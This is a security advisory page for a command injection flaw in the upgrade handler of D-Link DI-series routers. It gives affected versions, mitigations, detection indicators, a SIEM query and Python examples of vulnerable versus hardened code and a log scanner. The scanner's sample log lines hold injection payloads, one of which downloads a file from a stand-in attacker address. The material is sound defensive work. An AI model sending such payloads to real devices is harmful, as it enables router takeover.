CVE-2025-10441

CVSS base score: 6.3 (MEDIUM)

📋 TL;DR

This CVE describes an OS command injection in the web management interface (the jhttpd component) of several D-Link DI-series routers. A value supplied in the 'path' parameter of version_upgrade.asp reaches an OS command without sanitisation, so an attacker who can reach the interface over the network can execute arbitrary commands on the router. Organizations running the affected models and firmware versions listed below are exposed to full device compromise.
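The bug class behind this entry, as an added illustration that is not jhttpd's code and does not model the D-Link firmware: a request parameter interpolated into a shell command string is injectable, while the same handler validated against an allowlist and executed with an argv list (no shell) is not. `UPGRADE_TOOL` (set to `echo` so the demo is harmless) and `ALLOWED_DIR` are assumptions standing in for the real upgrade binary and image directory.

```python
import os
import re
import subprocess

# Illustrative stand-in, not jhttpd's code: it shows why a request parameter
# interpolated into a shell command string (the class of bug this CVE
# describes) is injectable, and one hardened shape for the same handler.
UPGRADE_TOOL = "echo"          # assumption: placeholder for the real upgrade binary
ALLOWED_DIR = "/tmp/upgrade"   # assumption: where firmware images may live

# A bare file name: letters, digits, dot, underscore, dash. No separators,
# no whitespace, no shell metacharacters.
PATH_ALLOWLIST = re.compile(r"[A-Za-z0-9._-]+")


def vulnerable_upgrade(path: str) -> str:
    """Vulnerable pattern: value from the request goes straight into a shell string.

    Equivalent to C such as  sprintf(cmd, "upgrade %s", path); system(cmd);
    Anything after ';', '|', '&', '`' or '$(' in 'path' becomes a second command.
    """
    cmd = f"{UPGRADE_TOOL} {path}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def is_safe_path(path: str) -> bool:
    """Allowlist check: plain file name that still resolves inside ALLOWED_DIR
    after normalisation (rejects '.', '..' and anything with a separator)."""
    if not PATH_ALLOWLIST.fullmatch(path):
        return False
    full = os.path.normpath(os.path.join(ALLOWED_DIR, path))
    return os.path.dirname(full) == ALLOWED_DIR


def safe_upgrade(path: str) -> str:
    """Hardened pattern: validate first, then exec with an argv list (no shell).

    With no shell in the loop the value is one argument whatever it contains;
    the allowlist additionally keeps it a plain file name inside ALLOWED_DIR.
    """
    if not is_safe_path(path):
        raise ValueError(f"rejected upgrade path: {path!r}")
    full = os.path.join(ALLOWED_DIR, path)
    out = subprocess.run([UPGRADE_TOOL, full], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    benign = "fw.bin"
    hostile = "fw.bin; echo INJECTED"
    print("vulnerable, benign :", repr(vulnerable_upgrade(benign)))
    print("vulnerable, hostile:", repr(vulnerable_upgrade(hostile)))
    print("hardened, benign   :", repr(safe_upgrade(benign)))
    try:
        safe_upgrade(hostile)
    except ValueError as err:
        print("hardened, hostile  :", err)
```

Run stand-alone, the vulnerable handler prints a second line, INJECTED, for the hostile input, because `/bin/sh` parsed the `;`; the hardened handler rejects the same input before any process is started.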

💻 Affected Systems

Products:
  • D-Link DI-8100G
  • D-Link DI-8200G
  • D-Link DI-8003G
Versions: 17.12.20A1, 19.12.10A1
Operating Systems: Embedded Linux/Proprietary Router OS
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the jhttpd component's web interface. Default configurations are vulnerable.

⚠️ Manual Verification Required

The NVD entry for this CVE carries no CPE version ranges, so automated matching cannot decide whether a given device is affected. The model and firmware versions listed above come from the advisory text; confirm your running firmware against that list by hand.

Why? The CVE database entry does not specify vulnerable version ranges (none were provided by the vendor/NVD), and automated scanners key on those ranges rather than on free-text version strings.

Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full system compromise allowing attacker to execute arbitrary commands, install malware, pivot to internal networks, and maintain persistent access.

🟠 Likely Case

Router compromise leading to network traffic interception, credential theft, and deployment of additional payloads.

🟢 If Mitigated

Limited impact with proper network segmentation and access controls preventing lateral movement.

🌐 Internet-Facing: HIGH - A router whose web management interface is reachable from the WAN can be attacked by anyone on the internet, and the public PoC makes this the primary exposure.
🏢 Internal Only: MEDIUM - An attacker who already has a foothold on the LAN or management VLAN can reach the interface; it takes targeting of these specific models, but compromising the gateway then gives a vantage point over all traffic crossing it.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Reported as yes (unconfirmed; see note below)
Complexity: LOW

A public exploit is available on GitHub and the issue is reachable over the network. Treat the "unauthenticated" claim with caution: under CVSS v3.x, a network-reachable, low-complexity injection with low confidentiality, integrity and availability impacts scores 7.3 when no privileges are required and 6.3 when low privileges are required, so the 6.3 score on this entry is consistent with the attacker needing a valid login to the web interface. Check the vector string in the NVD entry before assuming exposure without credentials, and do not let default or weak admin credentials be the only thing standing between the internet and this handler either way.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NOT AVAILABLE

Restart Required: Yes for a firmware update (the router reboots to apply new firmware); the workarounds below normally take effect without one.

Instructions:

Check D-Link security advisories for firmware updates. No specific patch version identified in available references.

🔧 Temporary Workarounds

Disable Web Interface

Applies to: all affected models

Disable the vulnerable web interface component if it is not required for operations. On a router the web UI is usually the only management plane, so in practice this means turning off WAN-side (remote) management and leaving the interface reachable only from the LAN or a dedicated management VLAN. The menu or command for this is model-specific; consult the device manual.

Network Segmentation

Applies to: all affected models

Isolate affected routers in a separate network segment with strict firewall rules: permit access to the management interface only from designated admin hosts, and deny it from the WAN and from user VLANs.

🧯 If You Can't Patch

  • Restrict access to the web management interface to trusted admin IPs only, and disable remote (WAN-side) management entirely
  • Monitor for suspicious requests to version_upgrade.asp and for network anomalies; most SOHO routers do not log process execution, so web access logs from an upstream proxy and NetFlow or IDS data are the realistic sources
  • Replace default or weak admin credentials, since any privilege requirement for this bug is only as strong as the login in front of it

🔍 How to Verify

Check if Vulnerable:

Check the router model and firmware version. A DI-8100G, DI-8200G or DI-8003G running firmware 17.12.20A1 or 19.12.10A1 is affected. Other versions are unconfirmed either way because no vendor advisory is available, so treat them as suspect until D-Link states otherwise.

Check Version:

Read the firmware version from the web interface's system status page, or from the CLI where the model provides one; the exact location is model-specific.

Verify Fix Applied:

Verify the firmware is a version the vendor identifies as fixed, not merely one absent from the affected list above. Then confirm the web interface still works and, if you applied a workaround, that the management interface is no longer reachable from untrusted networks.

📡 Detection & Monitoring

Log Indicators:

  • Requests to version_upgrade.asp whose path parameter contains shell metacharacters (; | & ` $( ), including their URL-encoded forms such as %3B, %7C and %60
  • Upgrade requests from source addresses that are not your admin hosts, or outside change windows
  • Multiple failed or repeated upgrade attempts
  • Unusual command execution in system logs, where the device records it (most SOHO routers do not)

Network Indicators:

  • Unexpected outbound connections from the router, for example an HTTP or TFTP fetch of a second-stage payload shortly after a request to version_upgrade.asp
  • Traffic patterns indicating command and control

SIEM Query:

source="router_logs" AND uri="*version_upgrade.asp*" AND (uri="*path=*;*" OR uri="*path=*%3B*" OR uri="*path=*|*" OR uri="*path=*%7C*" OR uri="*path=*`*" OR uri="*path=*%60*" OR uri="*path=*$(*" OR uri="*path=*%24%28*")

Key the query on the request URI rather than a command field (router web logs rarely carry one), and include the URL-encoded forms, since scanners and exploits typically send the parameter encoded. A path value carried in a POST body does not appear in the URI; inspect those requests at a reverse proxy or IDS that sees the body.
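The same detection run over access-log lines offline, as an added example rather than anything from the original entry: it picks out requests to version_upgrade.asp whose path parameter contains shell metacharacters after percent-decoding, and decodes a second time so double-encoded payloads (%253B) are not missed. The log lines are constructed for the example (203.0.113.7 is a documentation address standing in for an attacker); the combined log format is an assumption about what an upstream proxy or the device exports.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format). NOT real device
# logs; 203.0.113.7 is a documentation address standing in for an attacker.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Oct/2025:10:00:01 +0000] "GET /version_upgrade.asp HTTP/1.1" 200 1203',
    '10.0.0.5 - - [01/Oct/2025:10:00:09 +0000] "GET /version_upgrade.asp?path=fw.bin HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Oct/2025:10:02:33 +0000] "GET /version_upgrade.asp?path=fw.bin%3Bwget%20http%3A%2F%2F203.0.113.7%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Oct/2025:10:02:40 +0000] "GET /version_upgrade.asp?path=fw.bin%60id%60 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Oct/2025:10:02:51 +0000] "GET /version_upgrade.asp?path=fw.bin%253Breboot HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Oct/2025:10:05:00 +0000] "GET /status.asp HTTP/1.1" 200 4100',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that turn a file name into a second command.
SHELL_META = re.compile(r"[;|&`$(){}\r\n]")
TARGET_PAGE = "version_upgrade.asp"
WATCHED_PARAMS = ("path",)   # the parameter named in the advisory


def inspect_line(line):
    """Return a finding dict for a request to version_upgrade.asp that carries
    shell metacharacters in a watched parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + TARGET_PAGE):
        return None
    # parse_qs percent-decodes once; the extra unquote catches double-encoded
    # payloads such as %253B -> %3B -> ';'.
    params = parse_qs(url.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for raw in params.get(name, []):
            value = unquote(raw)
            if SHELL_META.search(value):
                return {
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "method": m.group("method"),
                    "param": name,
                    "value": value,
                }
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines; return the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"{hit['ts']} {hit['src']} {hit['method']} {hit['param']}={hit['value']!r}")
```

The plain upgrade request (path=fw.bin) is not flagged, so the rule keys on injection syntax rather than on any use of the page; pair it with the source-address check from the indicators above to catch an authenticated-looking request that comes from the wrong host.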
